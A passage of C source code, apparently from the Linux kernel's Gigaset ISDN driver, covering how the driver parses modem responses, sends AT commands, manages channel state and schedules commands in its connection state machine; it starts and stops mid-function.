if (curarg >= params) {
event->parameter = ZSAU_NONE;
break;
}
for (zr = zsau_resp; zr->str; ++zr)
if (!strcmp(argv[curarg], zr->str))
break;
event->parameter = zr->code;
if (!zr->str)
dev_warn(cs->dev,
"%s: unknown parameter %s after ZSAU\n",
__func__, argv[curarg]);
++curarg;
break;
case RT_STRING:
if (curarg < params) {
event->ptr = kstrdup(argv[curarg], GFP_ATOMIC);
if (!event->ptr)
dev_err(cs->dev, "out of memory\n");
++curarg;
}
gig_dbg(DEBUG_EVENT, "string==%s",
event->ptr ? (char *) event->ptr : "NULL");
break;
case RT_ZCAU:
event->parameter = -1;
if (curarg + 1 < params) {
u8 type, value;
i = kstrtou8(argv[curarg++], 16, &type);
j = kstrtou8(argv[curarg++], 16, &value);
if (i == 0 && j == 0)
event->parameter = (type << 8) | value;
} else
curarg = params - 1;
break;
case RT_NUMBER:
if (curarg >= params ||
kstrtoint(argv[curarg++], 10, &event->parameter))
event->parameter = -1;
gig_dbg(DEBUG_EVENT, "parameter==%d", event->parameter);
break;
}
if (resp_code == RSP_ZDLE)
cs->dle = event->parameter;
if (abort)
break;
}
cs->ev_tail = tail;
spin_unlock_irqrestore(&cs->ev_lock, flags);
if (curarg != params)
gig_dbg(DEBUG_EVENT,
"invalid number of processed parameters: %d/%d",
curarg, params);
}
EXPORT_SYMBOL_GPL(gigaset_handle_modem_response);
/* disconnect
* process closing of connection associated with given AT state structure
*/
static void disconnect(struct at_state_t **at_state_p)
{
unsigned long flags;
struct bc_state *bcs = (*at_state_p)->bcs;
struct cardstate *cs = (*at_state_p)->cs;
spin_lock_irqsave(&cs->lock, flags);
++(*at_state_p)->seq_index;
/* revert to selected idle mode */
if (!cs->cidmode) {
cs->at_state.pending_commands |= PC_UMMODE;
gig_dbg(DEBUG_EVENT, "Scheduling PC_UMMODE");
cs->commands_pending = 1;
}
spin_unlock_irqrestore(&cs->lock, flags);
if (bcs) {
/* B channel assigned: invoke hardware specific handler */
cs->ops->close_bchannel(bcs);
/* notify LL */
if (bcs->chstate & (CHS_D_UP | CHS_NOTIFY_LL)) {
bcs->chstate &= ~(CHS_D_UP | CHS_NOTIFY_LL);
gigaset_isdn_hupD(bcs);
}
} else {
/* no B channel assigned: just deallocate */
spin_lock_irqsave(&cs->lock, flags);
list_del(&(*at_state_p)->list);
kfree(*at_state_p);
*at_state_p = NULL;
spin_unlock_irqrestore(&cs->lock, flags);
}
}
/* get_free_channel
* get a free AT state structure: either one of those associated with the
* B channels of the Gigaset device, or if none of those is available,
* a newly allocated one with bcs=NULL
* The structure should be freed by calling disconnect() after use.
*/
static inline struct at_state_t *get_free_channel(struct cardstate *cs,
int cid)
/* cids: >0: siemens-cid
* 0: without cid
* -1: no cid assigned yet
*/
{
unsigned long flags;
int i;
struct at_state_t *ret;
for (i = 0; i < cs->channels; ++i)
if (gigaset_get_channel(cs->bcs + i) >= 0) {
ret = &cs->bcs[i].at_state;
ret->cid = cid;
return ret;
}
spin_lock_irqsave(&cs->lock, flags);
ret = kmalloc(sizeof(struct at_state_t), GFP_ATOMIC);
if (ret) {
gigaset_at_init(ret, NULL, cs, cid);
list_add(&ret->list, &cs->temp_at_states);
}
spin_unlock_irqrestore(&cs->lock, flags);
return ret;
}
static void init_failed(struct cardstate *cs, int mode)
{
int i;
struct at_state_t *at_state;
cs->at_state.pending_commands &= ~PC_INIT;
cs->mode = mode;
cs->mstate = MS_UNINITIALIZED;
gigaset_free_channels(cs);
for (i = 0; i < cs->channels; ++i) {
at_state = &cs->bcs[i].at_state;
if (at_state->pending_commands & PC_CID) {
at_state->pending_commands &= ~PC_CID;
at_state->pending_commands |= PC_NOCID;
cs->commands_pending = 1;
}
}
}
static void schedule_init(struct cardstate *cs, int state)
{
if (cs->at_state.pending_commands & PC_INIT) {
gig_dbg(DEBUG_EVENT, "not scheduling PC_INIT again");
return;
}
cs->mstate = state;
cs->mode = M_UNKNOWN;
gigaset_block_channels(cs);
cs->at_state.pending_commands |= PC_INIT;
gig_dbg(DEBUG_EVENT, "Scheduling PC_INIT");
cs->commands_pending = 1;
}
/* send an AT command
* adding the "AT" prefix, cid and DLE encapsulation as appropriate
*/
static void send_command(struct cardstate *cs, const char *cmd,
struct at_state_t *at_state)
{
int cid = at_state->cid;
struct cmdbuf_t *cb;
size_t buflen;
buflen = strlen(cmd) + 12; /* DLE ( A T 1 2 3 4 5 <cmd> DLE ) \0 */
cb = kmalloc(sizeof(struct cmdbuf_t) + buflen, GFP_ATOMIC);
if (!cb) {
dev_err(cs->dev, "%s: out of memory\n", __func__);
return;
}
if (cid > 0 && cid <= 65535)
cb->len = snprintf(cb->buf, buflen,
cs->dle ? "\020(AT%d%s\020)" : "AT%d%s",
cid, cmd);
else
cb->len = snprintf(cb->buf, buflen,
cs->dle ? "\020(AT%s\020)" : "AT%s",
cmd);
cb->offset = 0;
cb->next = NULL;
cb->wake_tasklet = NULL;
cs->ops->write_cmd(cs, cb);
}
static struct at_state_t *at_state_from_cid(struct cardstate *cs, int cid)
{
struct at_state_t *at_state;
int i;
unsigned long flags;
if (cid == 0)
return &cs->at_state;
for (i = 0; i < cs->channels; ++i)
if (cid == cs->bcs[i].at_state.cid)
return &cs->bcs[i].at_state;
spin_lock_irqsave(&cs->lock, flags);
list_for_each_entry(at_state, &cs->temp_at_states, list)
if (cid == at_state->cid) {
spin_unlock_irqrestore(&cs->lock, flags);
return at_state;
}
spin_unlock_irqrestore(&cs->lock, flags);
return NULL;
}
static void bchannel_down(struct bc_state *bcs)
{
if (bcs->chstate & CHS_B_UP) {
bcs->chstate &= ~CHS_B_UP;
gigaset_isdn_hupB(bcs);
}
if (bcs->chstate & (CHS_D_UP | CHS_NOTIFY_LL)) {
bcs->chstate &= ~(CHS_D_UP | CHS_NOTIFY_LL);
gigaset_isdn_hupD(bcs);
}
gigaset_free_channel(bcs);
gigaset_bcs_reinit(bcs);
}
static void bchannel_up(struct bc_state *bcs)
{
if (bcs->chstate & CHS_B_UP) {
dev_notice(bcs->cs->dev, "%s: B channel already up\n",
__func__);
return;
}
bcs->chstate |= CHS_B_UP;
gigaset_isdn_connB(bcs);
}
static void start_dial(struct at_state_t *at_state, void *data,
unsigned seq_index)
{
struct bc_state *bcs = at_state->bcs;
struct cardstate *cs = at_state->cs;
char **commands = data;
unsigned long flags;
int i;
bcs->chstate |= CHS_NOTIFY_LL;
spin_lock_irqsave(&cs->lock, flags);
if (at_state->seq_index != seq_index) {
spin_unlock_irqrestore(&cs->lock, flags);
goto error;
}
spin_unlock_irqrestore(&cs->lock, flags);
for (i = 0; i < AT_NUM; ++i) {
kfree(bcs->commands[i]);
bcs->commands[i] = commands[i];
}
at_state->pending_commands |= PC_CID;
gig_dbg(DEBUG_EVENT, "Scheduling PC_CID");
cs->commands_pending = 1;
return;
error:
for (i = 0; i < AT_NUM; ++i) {
kfree(commands[i]);
commands[i] = NULL;
}
at_state->pending_commands |= PC_NOCID;
gig_dbg(DEBUG_EVENT, "Scheduling PC_NOCID");
cs->commands_pending = 1;
return;
}
static void start_accept(struct at_state_t *at_state)
{
struct cardstate *cs = at_state->cs;
struct bc_state *bcs = at_state->bcs;
int i;
for (i = 0; i < AT_NUM; ++i) {
kfree(bcs->commands[i]);
bcs->commands[i] = NULL;
}
bcs->commands[AT_PROTO] = kmalloc(9, GFP_ATOMIC);
bcs->commands[AT_ISO] = kmalloc(9, GFP_ATOMIC);
if (!bcs->commands[AT_PROTO] || !bcs->commands[AT_ISO]) {
dev_err(at_state->cs->dev, "out of memory\n");
/* error reset */
at_state->pending_commands |= PC_HUP;
gig_dbg(DEBUG_EVENT, "Scheduling PC_HUP");
cs->commands_pending = 1;
return;
}
snprintf(bcs->commands[AT_PROTO], 9, "^SBPR=%u\r", bcs->proto2);
snprintf(bcs->commands[AT_ISO], 9, "^SISO=%u\r", bcs->channel + 1);
at_state->pending_commands |= PC_ACCEPT;
gig_dbg(DEBUG_EVENT, "Scheduling PC_ACCEPT");
cs->commands_pending = 1;
}
static void do_start(struct cardstate *cs)
{
gigaset_free_channels(cs);
if (cs->mstate != MS_LOCKED)
schedule_init(cs, MS_INIT);
cs->isdn_up = 1;
gigaset_isdn_start(cs);
cs->waiting = 0;
wake_up(&cs->waitqueue);
}
static void finish_shutdown(struct cardstate *cs)
{
if (cs->mstate != MS_LOCKED) {
cs->mstate = MS_UNINITIALIZED;
cs->mode = M_UNKNOWN;
}
/* Tell the LL that the device is not available .. */
if (cs->isdn_up) {
cs->isdn_up = 0;
gigaset_isdn_stop(cs);
}
/* The rest is done by cleanup_cs() in process context. */
cs->cmd_result = -ENODEV;
cs->waiting = 0;
wake_up(&cs->waitqueue);
}
static void do_shutdown(struct cardstate *cs)
{
gigaset_block_channels(cs);
if (cs->mstate == MS_READY) {
cs->mstate = MS_SHUTDOWN;
cs->at_state.pending_commands |= PC_SHUTDOWN;
gig_dbg(DEBUG_EVENT, "Scheduling PC_SHUTDOWN");
cs->commands_pending = 1;
} else
finish_shutdown(cs);
}
static void do_stop(struct cardstate *cs)
{
unsigned long flags;
spin_lock_irqsave(&cs->lock, flags);
cs->connected = 0;
spin_unlock_irqrestore(&cs->lock, flags);
do_shutdown(cs);
}
/* Entering cid mode or getting a cid failed:
* try to initialize the device and try again.
*
* channel >= 0: getting cid for the channel failed
* channel < 0: entering cid mode failed
*
* returns 0 on success, <0 on failure
*/
static int reinit_and_retry(struct cardstate *cs, int channel)
{
int i;
if (--cs->retry_count <= 0)
return -EFAULT;
for (i = 0; i < cs->channels; ++i)
if (cs->bcs[i].at_state.cid > 0)
return -EBUSY;
if (channel < 0)
dev_warn(cs->dev,
"Could not enter cid mode. Reinit device and try again.\n");
else {
dev_warn(cs->dev,
"Could not get a call id. Reinit device and try again.\n");
cs->bcs[channel].at_state.pending_commands |= PC_CID;
}
schedule_init(cs, MS_INIT);
return 0;
}
static int at_state_invalid(struct cardstate *cs,
struct at_state_t *test_ptr)
{
unsigned long flags;
unsigned channel;
struct at_state_t *at_state;
int retval = 0;
spin_lock_irqsave(&cs->lock, flags);
if (test_ptr == &cs->at_state)
goto exit;
list_for_each_entry(at_state, &cs->temp_at_states, list)
if (at_state == test_ptr)
goto exit;
for (channel = 0; channel < cs->channels; ++channel)
if (&cs->bcs[channel].at_state == test_ptr)
goto exit;
retval = 1;
exit:
spin_unlock_irqrestore(&cs->lock, flags);
return retval;
}
static void handle_icall(struct cardstate *cs, struct bc_state *bcs,
struct at_state_t *at_state)
{
int retval;
retval = gigaset_isdn_icall(at_state);
switch (retval) {
case ICALL_ACCEPT:
break;
default:
dev_err(cs->dev, "internal error: disposition=%d\n", retval);
/* --v-- fall through --v-- */
case ICALL_IGNORE:
case ICALL_REJECT:
/* hang up actively
* Device doc says that would reject the call.
* In fact it doesn't.
*/
at_state->pending_commands |= PC_HUP;
cs->commands_pending = 1;
break;
}
}
static int do_lock(struct cardstate *cs)
{
int mode;
int i;
switch (cs->mstate) {
case MS_UNINITIALIZED:
case MS_READY:
if (cs->cur_at_seq || !list_empty(&cs->temp_at_states) ||
cs->at_state.pending_commands)
return -EBUSY;
for (i = 0; i < cs->channels; ++i)
if (cs->bcs[i].at_state.pending_commands)
return -EBUSY;
if (gigaset_get_channels(cs) < 0)
return -EBUSY;
break;
case MS_LOCKED:
break;
default:
return -EBUSY;
}
mode = cs->mode;
cs->mstate = MS_LOCKED;
cs->mode = M_UNKNOWN;
return mode;
}
static int do_unlock(struct cardstate *cs)
{
if (cs->mstate != MS_LOCKED)
return -EINVAL;
cs->mstate = MS_UNINITIALIZED;
cs->mode = M_UNKNOWN;
gigaset_free_channels(cs);
if (cs->connected)
schedule_init(cs, MS_INIT);
return 0;
}
static void do_action(int action, struct cardstate *cs,
struct bc_state *bcs,
struct at_state_t **p_at_state, char **pp_command,
int *p_genresp, int *p_resp_code,
struct event_t *ev)
{
struct at_state_t *at_state = *p_at_state;
struct at_state_t *at_state2;
unsigned long flags;
int channel;
unsigned char *s, *e;
int i;
unsigned long val;
switch (action) {
case ACT_NOTHING:
break;
case ACT_TIMEOUT:
at_state->waiting = 1;
break;
case ACT_INIT:
cs->at_state.pending_commands &= ~PC_INIT;
cs->cur_at_seq = SEQ_NONE;
cs->mode = M_UNIMODEM;
spin_lock_irqsave(&cs->lock, flags);
if (!cs->cidmode) {
spin_unlock_irqrestore(&cs->lock, flags);
gigaset_free_channels(cs);
cs->mstate = MS_READY;
break;
}
spin_unlock_irqrestore(&cs->lock, flags);
cs->at_state.pending_commands |= PC_CIDMODE;
gig_dbg(DEBUG_EVENT, "Scheduling PC_CIDMODE");
cs->commands_pending = 1;
break;
case ACT_FAILINIT:
dev_warn(cs->dev, "Could not initialize the device.\n");
cs->dle = 0;
init_failed(cs, M_UNKNOWN);
cs->cur_at_seq = SEQ_NONE;
break;
case ACT_CONFIGMODE:
init_failed(cs, M_CONFIG);
cs->cur_at_seq = SEQ_NONE;
break;
case ACT_SETDLE1:
cs->dle = 1;
/* cs->inbuf[0].inputstate |= INS_command | INS_DLE_command; */
cs->inbuf[0].inputstate &=
~(INS_command | INS_DLE_command);
break;
case ACT_SETDLE0:
cs->dle = 0;
cs->inbuf[0].inputstate =
(cs->inbuf[0].inputstate & ~INS_DLE_command)
| INS_command;
break;
case ACT_CMODESET:
if (cs->mstate == MS_INIT || cs->mstate == MS_RECOVER) {
gigaset_free_channels(cs);
cs->mstate = MS_READY;
}
cs->mode = M_CID;
cs->cur_at_seq = SEQ_NONE;
break;
case ACT_UMODESET:
cs->mode = M_UNIMODEM;
cs->cur_at_seq = SEQ_NONE;
break;
case ACT_FAILCMODE:
cs->cur_at_seq = SEQ_NONE;
if (cs->mstate == MS_INIT || cs->mstate == MS_RECOVER) {
init_failed(cs, M_UNKNOWN);
break;
}
if (reinit_and_retry(cs, -1) < 0)
schedule_init(cs, MS_RECOVER);
break;
case ACT_FAILUMODE:
cs->cur_at_seq = SEQ_NONE;
schedule_init(cs, MS_RECOVER);
break;
case ACT_HUPMODEM:
/* send "+++" (hangup in unimodem mode) */
if (cs->connected) {
struct cmdbuf_t *cb;
cb = kmalloc(sizeof(struct cmdbuf_t) + 3, GFP_ATOMIC);
if (!cb) {
dev_err(cs->dev, "%s: out of memory\n",
__func__);
return;
}
memcpy(cb->buf, "+++", 3);
cb->len = 3;
cb->offset = 0;
cb->next = NULL;
cb->wake_tasklet = NULL;
cs->ops->write_cmd(cs, cb);
}
break;
case ACT_RING:
/* get fresh AT state structure for new CID */
at_state2 = get_free_channel(cs, ev->parameter);
if (!at_state2) {
dev_warn(cs->dev,
"RING ignored: could not allocate channel structure\n");
break;
}
/* initialize AT state structure
* note that bcs may be NULL if no B channel is free
*/
at_state2->ConState = 700;
for (i = 0; i < STR_NUM; ++i) {
kfree(at_state2->str_var[i]);
at_state2->str_var[i] = NULL;
}
at_state2->int_var[VAR_ZCTP] = -1;
spin_lock_irqsave(&cs->lock, flags);
at_state2->timer_expires = RING_TIMEOUT;
at_state2->timer_active = 1;
spin_unlock_irqrestore(&cs->lock, flags);
break;
case ACT_ICALL:
handle_icall(cs, bcs, at_state);
break;
case ACT_FAILSDOWN:
dev_warn(cs->dev, "Could not shut down the device.\n");
/* fall through */
case ACT_FAKESDOWN:
case ACT_SDOWN:
cs->cur_at_seq = SEQ_NONE;
finish_shutdown(cs);
break;
case ACT_CONNECT:
if (cs->onechannel) {
at_state->pending_commands |= PC_DLE1;
cs->commands_pending = 1;
break;
}
bcs->chstate |= CHS_D_UP;
gigaset_isdn_connD(bcs);
cs->ops->init_bchannel(bcs);
break;
case ACT_DLE1:
cs->cur_at_seq = SEQ_NONE;
bcs = cs->bcs + cs->curchannel;
bcs->chstate |= CHS_D_UP;
gigaset_isdn_connD(bcs);
cs->ops->init_bchannel(bcs);
break;
case ACT_FAKEHUP:
at_state->int_var[VAR_ZSAU] = ZSAU_NULL;
/* fall through */
case ACT_DISCONNECT:
cs->cur_at_seq = SEQ_NONE;
at_state->cid = -1;
if (bcs && cs->onechannel && cs->dle) {
/* Check for other open channels not needed:
* DLE only used for M10x with one B channel.
*/
at_state->pending_commands |= PC_DLE0;
cs->commands_pending = 1;
} else
disconnect(p_at_state);
break;
case ACT_FAKEDLE0:
at_state->int_var[VAR_ZDLE] = 0;
cs->dle = 0;
/* fall through */
case ACT_DLE0:
cs->cur_at_seq = SEQ_NONE;
at_state2 = &cs->bcs[cs->curchannel].at_state;
disconnect(&at_state2);
break;
case ACT_ABORTHUP:
cs->cur_at_seq = SEQ_NONE;
dev_warn(cs->dev, "Could not hang up.\n");
at_state->cid = -1;
if (bcs && cs->onechannel)
at_state->pending_commands |= PC_DLE0;
else
disconnect(p_at_state);
schedule_init(cs, MS_RECOVER);
break;
case ACT_FAILDLE0:
cs->cur_at_seq = SEQ_NONE;
dev_warn(cs->dev, "Could not leave DLE mode.\n");
at_state2 = &cs->bcs[cs->curchannel].at_state;
disconnect(&at_state2);
schedule_init(cs, MS_RECOVER);
break;
case ACT_FAILDLE1:
cs->cur_at_seq = SEQ_NONE;
dev_warn(cs->dev,
"Could not enter DLE mode. Trying to hang up.\n");
channel = cs->curchannel;
cs->bcs[channel].at_state.pending_commands |= PC_HUP;
cs->commands_pending = 1;
break;
case ACT_CID: /* got cid; start dialing */
cs->cur_at_seq = SEQ_NONE;
channel = cs->curchannel;
if (ev->parameter > 0 && ev->parameter <= 65535) {
cs->bcs[channel].at_state.cid = ev->parameter;
cs->bcs[channel].at_state.pending_commands |=
PC_DIAL;
cs->commands_pending = 1;
break;
}
/* bad cid: fall through */
case ACT_FAILCID:
cs->cur_at_seq = SEQ_NONE;
channel = cs->curchannel;
if (reinit_and_retry(cs, channel) < 0) {
dev_warn(cs->dev,
"Could not get a call ID. Cannot dial.\n");
at_state2 = &cs->bcs[channel].at_state;
disconnect(&at_state2);
}
break;
case ACT_ABORTCID:
cs->cur_at_seq = SEQ_NONE;
at_state2 = &cs->bcs[cs->curchannel].at_state;
disconnect(&at_state2);
break;
case ACT_DIALING:
case ACT_ACCEPTED:
cs->cur_at_seq = SEQ_NONE;
break;
case ACT_ABORTACCEPT: /* hangup/error/timeout during ICALL procssng */
disconnect(p_at_state);
break;
case ACT_ABORTDIAL: /* error/timeout during dial preparation */
cs->cur_at_seq = SEQ_NONE;
at_state->pending_commands |= PC_HUP;
cs->commands_pending = 1;
break;
case ACT_REMOTEREJECT: /* DISCONNECT_IND after dialling */
case ACT_CONNTIMEOUT: /* timeout waiting for ZSAU=ACTIVE */
case ACT_REMOTEHUP: /* DISCONNECT_IND with established connection */
at_state->pending_commands |= PC_HUP;
cs->commands_pending = 1;
break;
case ACT_GETSTRING: /* warning: RING, ZDLE, ...
are not handled properly anymore */
at_state->getstring = 1;
break;
case ACT_SETVER:
if (!ev->ptr) {
*p_genresp = 1;
*p_resp_code = RSP_ERROR;
break;
}
s = ev->ptr;
if (!strcmp(s, "OK")) {
/* OK without version string: assume old response */
*p_genresp = 1;
*p_resp_code = RSP_NONE;
break;
}
for (i = 0; i < 4; ++i) {
val = simple_strtoul(s, (char **) &e, 10);
if (val > INT_MAX || e == s)
break;
if (i == 3) {
if (*e)
break;
} else if (*e != '.')
break;
else
s = e + 1;
cs->fwver[i] = val;
}
if (i != 4) {
*p_genresp = 1;
*p_resp_code = RSP_ERROR;
break;
}
cs->gotfwver = 0;
break;
case ACT_GOTVER:
if (cs->gotfwver == 0) {
cs->gotfwver = 1;
gig_dbg(DEBUG_EVENT,
"firmware version %02d.%03d.%02d.%02d",
cs->fwver[0], cs->fwver[1],
cs->fwver[2], cs->fwver[3]);
break;
}
/* fall through */
case ACT_FAILVER:
cs->gotfwver = -1;
dev_err(cs->dev, "could not read firmware version.\n");
break;
case ACT_ERROR:
gig_dbg(DEBUG_ANY, "%s: ERROR response in ConState %d",
__func__, at_state->ConState);
cs->cur_at_seq = SEQ_NONE;
break;
case ACT_DEBUG:
gig_dbg(DEBUG_ANY, "%s: resp_code %d in ConState %d",
__func__, ev->type, at_state->ConState);
break;
case ACT_WARN:
dev_warn(cs->dev, "%s: resp_code %d in ConState %d!\n",
__func__, ev->type, at_state->ConState);
break;
case ACT_ZCAU:
dev_warn(cs->dev, "cause code %04x in connection state %d.\n",
ev->parameter, at_state->ConState);
break;
/* events from the LL */
case ACT_DIAL:
start_dial(at_state, ev->ptr, ev->parameter);
break;
case ACT_ACCEPT:
start_accept(at_state);
break;
case ACT_HUP:
at_state->pending_commands |= PC_HUP;
gig_dbg(DEBUG_EVENT, "Scheduling PC_HUP");
cs->commands_pending = 1;
break;
/* hotplug events */
case ACT_STOP:
do_stop(cs);
break;
case ACT_START:
do_start(cs);
break;
/* events from the interface */
case ACT_IF_LOCK:
cs->cmd_result = ev->parameter ? do_lock(cs) : do_unlock(cs);
cs->waiting = 0;
wake_up(&cs->waitqueue);
break;
case ACT_IF_VER:
if (ev->parameter != 0)
cs->cmd_result = -EINVAL;
else if (cs->gotfwver != 1) {
cs->cmd_result = -ENOENT;
} else {
memcpy(ev->arg, cs->fwver, sizeof cs->fwver);
cs->cmd_result = 0;
}
cs->waiting = 0;
wake_up(&cs->waitqueue);
break;
/* events from the proc file system */
case ACT_PROC_CIDMODE:
spin_lock_irqsave(&cs->lock, flags);
if (ev->parameter != cs->cidmode) {
cs->cidmode = ev->parameter;
if (ev->parameter) {
cs->at_state.pending_commands |= PC_CIDMODE;
gig_dbg(DEBUG_EVENT, "Scheduling PC_CIDMODE");
} else {
cs->at_state.pending_commands |= PC_UMMODE;
gig_dbg(DEBUG_EVENT, "Scheduling PC_UMMODE");
}
cs->commands_pending = 1;
}
spin_unlock_irqrestore(&cs->lock, flags);
cs->waiting = 0;
wake_up(&cs->waitqueue);
break;
/* events from the hardware drivers */
case ACT_NOTIFY_BC_DOWN:
bchannel_down(bcs);
break;
case ACT_NOTIFY_BC_UP:
bchannel_up(bcs);
break;
case ACT_SHUTDOWN:
do_shutdown(cs);
break;
default:
if (action >= ACT_CMD && action < ACT_CMD + AT_NUM) {
*pp_command = at_state->bcs->commands[action - ACT_CMD];
if (!*pp_command) {
*p_genresp = 1;
*p_resp_code = RSP_NULL;
}
} else
dev_err(cs->dev, "%s: action==%d!\n", __func__, action);
}
}
/* State machine to do the calling and hangup procedure */
static void process_event(struct cardstate *cs, struct event_t *ev)
{
struct bc_state *bcs;
char *p_command = NULL;
struct reply_t *rep;
int rcode;
int genresp = 0;
int resp_code = RSP_ERROR;
struct at_state_t *at_state;
int index;
int curact;
unsigned long flags;
if (ev->cid >= 0) {
at_state = at_state_from_cid(cs, ev->cid);
if (!at_state) {
gig_dbg(DEBUG_EVENT, "event %d for invalid cid %d",
ev->type, ev->cid);
gigaset_add_event(cs, &cs->at_state, RSP_WRONG_CID,
NULL, 0, NULL);
return;
}
} else {
at_state = ev->at_state;
if (at_state_invalid(cs, at_state)) {
gig_dbg(DEBUG_EVENT, "event for invalid at_state %p",
at_state);
return;
}
}
gig_dbg(DEBUG_EVENT, "connection state %d, event %d",
at_state->ConState, ev->type);
bcs = at_state->bcs;
/* Setting the pointer to the dial array */
rep = at_state->replystruct;
spin_lock_irqsave(&cs->lock, flags);
if (ev->type == EV_TIMEOUT) {
if (ev->parameter != at_state->timer_index
|| !at_state->timer_active) {
ev->type = RSP_NONE; /* old timeout */
gig_dbg(DEBUG_EVENT, "old timeout");
} else {
if (at_state->waiting)
gig_dbg(DEBUG_EVENT, "stopped waiting");
else
gig_dbg(DEBUG_EVENT, "timeout occurred");
}
}
spin_unlock_irqrestore(&cs->lock, flags);
/* if the response belongs to a variable in at_state->int_var[VAR_XXXX]
or at_state->str_var[STR_XXXX], set it */
if (ev->type >= RSP_VAR && ev->type < RSP_VAR + VAR_NUM) {
index = ev->type - RSP_VAR;
at_state->int_var[index] = ev->parameter;
} else if (ev->type >= RSP_STR && ev->type < RSP_STR + STR_NUM) {
index = ev->type - RSP_STR;
kfree(at_state->str_var[index]);
at_state->str_var[index] = ev->ptr;
ev->ptr = NULL; /* prevent process_events() from
deallocating ptr */
}
if (ev->type == EV_TIMEOUT || ev->type == RSP_STRING)
at_state->getstring = 0;
/* Search row in dial array which matches modem response and current
constate */
for (;; rep++) {
rcode = rep->resp_code;
if (rcode == RSP_LAST) {
/* found nothing...*/
dev_warn(cs->dev, "%s: rcode=RSP_LAST: "
"resp_code %d in ConState %d!\n",
__func__, ev->type, at_state->ConState);
return;
}
if ((rcode == RSP_ANY || rcode == ev->type)
&& ((int) at_state->ConState >= rep->min_ConState)
&& (rep->max_ConState < 0
|| (int) at_state->ConState <= rep->max_ConState)
&& (rep->parameter < 0 || rep->parameter == ev->parameter))
break;
}
p_command = rep->command;
at_state->waiting = 0;
for (curact = 0; curact < MAXACT; ++curact) {
/* The row tells us what we should do ..
*/
do_action(rep->action[curact], cs, bcs, &at_state, &p_command,
&genresp, &resp_code, ev);
if (!at_state)
/* at_state destroyed by disconnect */
return;
}
/* Jump to the next con-state regarding the array */
if (rep->new_ConState >= 0)
at_state->ConState = rep->new_ConState;
if (genresp) {
spin_lock_irqsave(&cs->lock, flags);
at_state->timer_expires = 0;
at_state->timer_active = 0;
spin_unlock_irqrestore(&cs->lock, flags);
gigaset_add_event(cs, at_state, resp_code, NULL, 0, NULL);
} else {
/* Send command to modem if not NULL... */
if (p_command) {
if (cs->connected)
send_command(cs, p_command, at_state);
else
gigaset_add_event(cs, at_state, RSP_NODEV,
NULL, 0, NULL);
}
spin_lock_irqsave(&cs->lock, flags);
if (!rep->timeout) {
at_state->timer_expires = 0;
at_state->timer_active = 0;
} else if (rep->timeout > 0) { /* new timeout */
at_state->timer_expires = rep->timeout * 10;
at_state->timer_active = 1;
++at_state->timer_index;
}
spin_unlock_irqrestore(&cs->lock, flags);
}
}
static void schedule_sequence(struct cardstate *cs,
struct at_state_t *at_state, int sequence)
{
cs->cur_at_seq = sequence;
gigaset_add_event(cs, at_state, RSP_INIT, NULL, sequence, NULL);
}
static void process_command_flags(struct cardstate *cs)
{
struct at_state_t *at_state = NULL;
struct bc_state *bcs;
int i;
int sequence;
unsigned long flags;
cs->commands_pending = 0;
if (cs->cur_at_seq) {
gig_dbg(DEBUG_EVENT, "not searching scheduled commands: busy");
return;
}
gig_dbg(DEBUG_EVENT, "searching scheduled commands");
sequence = SEQ_NONE;
/* clear pending_commands and hangup channels on shutdown */
if (cs->at_state.pending_commands & PC_SHUTDOWN) {
cs->at_state.pending_commands &= ~PC_CIDMODE;
for (i = 0; i < cs->channels; ++i) {
bcs = cs->bcs + i;
at_state = &bcs->at_state;
at_state->pending_commands &=
~(PC_DLE1 | PC_ACCEPT | PC_DIAL);
if (at_state->cid > 0)
at_state->pending_commands |= PC_HUP;
if (at_state->pending_commands & PC_CID) {
at_state->pending_commands |= PC_NOCID;
at_state->pending_commands &= ~PC_CID;
}
}
}
/* clear pending_commands and hangup channels on reset */
if (cs->at_state.pending_commands & PC_INIT) {
cs->at_state.pending_commands &= ~PC_CIDMODE;
for (i = 0; i < cs->channels; ++i) {
bcs = cs->bcs + i;
at_state = &bcs->at_state;
at_state->pending_commands &=
~(PC_DLE1 | PC_ACCEPT | PC_DIAL);
if (at_state->cid > 0)
at_state->pending_commands |= PC_HUP;
if (cs->mstate == MS_RECOVER) {
if (at_state->pending_commands & PC_CID) {
at_state->pending_commands |= PC_NOCID;
at_state->pending_commands &= ~PC_CID;
}
}
}
}
/* only switch back to unimodem mode if no commands are pending and
* no channels are up */
spin_lock_irqsave(&cs->lock, flags);
if (cs->at_state.pending_commands == PC_UMMODE
&& !cs->cidmode
&& list_empty(&cs->temp_at_states)
&& cs->mode == M_CID) {
sequence = SEQ_UMMODE;
at_state = &cs->at_state;
for (i = 0; i < cs->channels; ++i) {
bcs = cs->bcs + i;
if (bcs->at_state.pending_commands ||
bcs->at_state.cid > 0) {
sequence = SEQ_NONE;
break;
}
}
}
spin_unlock_irqrestore(&cs->lock, flags);
cs->at_state.pending_commands &= ~PC_UMMODE;
if (sequence != SEQ_NONE) {
schedule_sequence(cs, at_state, sequence);
return;
}
for (i = 0; i < cs->channels; ++i) {
bcs = cs->bcs + i;
if (bcs->at_state.pending_commands & PC_HUP) {
if (cs->dle) {
cs->curchannel = bcs->channel;
schedule_sequence(cs, &cs->at_state, SEQ_DLE0);
return;
}
bcs->at_state.pending_commands &= ~PC_HUP;
if (bcs->at_state.pending_commands & PC_CID) {
/* not yet dialing: PC_NOCID is sufficient */
bcs->at_state.pending_commands |= PC_NOCID;
bcs->at_state.pending_commands &= ~PC_CID;
} else {
schedule_sequence(cs, &bcs->at_state, SEQ_HUP);
return;
}
}
if (bcs->at_state.pending_commands & PC_NOCID) {
bcs->at_state.pending_commands &= ~PC_NOCID;
cs->curchannel = bcs->channel;
schedule_sequence(cs, &cs->at_state, SEQ_NOCID);
return;
} else if (bcs->at_state.pending_commands & PC_DLE0) {
bcs->at_state.pending_commands &= ~PC_DLE0;
cs->curchannel = bcs->channel;
schedule_sequence(cs, &cs->at_state, SEQ_DLE0);
return;
}
}
list_for_each_entry(at_state, &cs->temp_at_states, list)
if (at_state->pending_commands & PC_HUP) {
at_state->pending_commands &= ~PC_HUP;
schedule_sequence(cs, at_state, SEQ_HUP);
return;
}
if (cs->at_state.pending_commands & PC_INIT) {
cs->at_state.pending_commands &= ~PC_INIT;
cs->dle = 0;
cs->inbuf->inputstate = INS_command;
schedule_sequence(cs, &cs->at_state, SEQ_INIT);
return;
}
if (cs->at_state.pending_commands & PC_SHUTDOWN) {
cs->at_state.pending_commands &= ~PC_SHUTDOWN;
schedule_sequence(cs, &cs->at_state, SEQ_SHUTDOWN);
return;
}
if (cs->at_state.pending_commands & PC_CIDMODE) {
cs->at_state.pending_commands &= ~PC_CIDMODE;
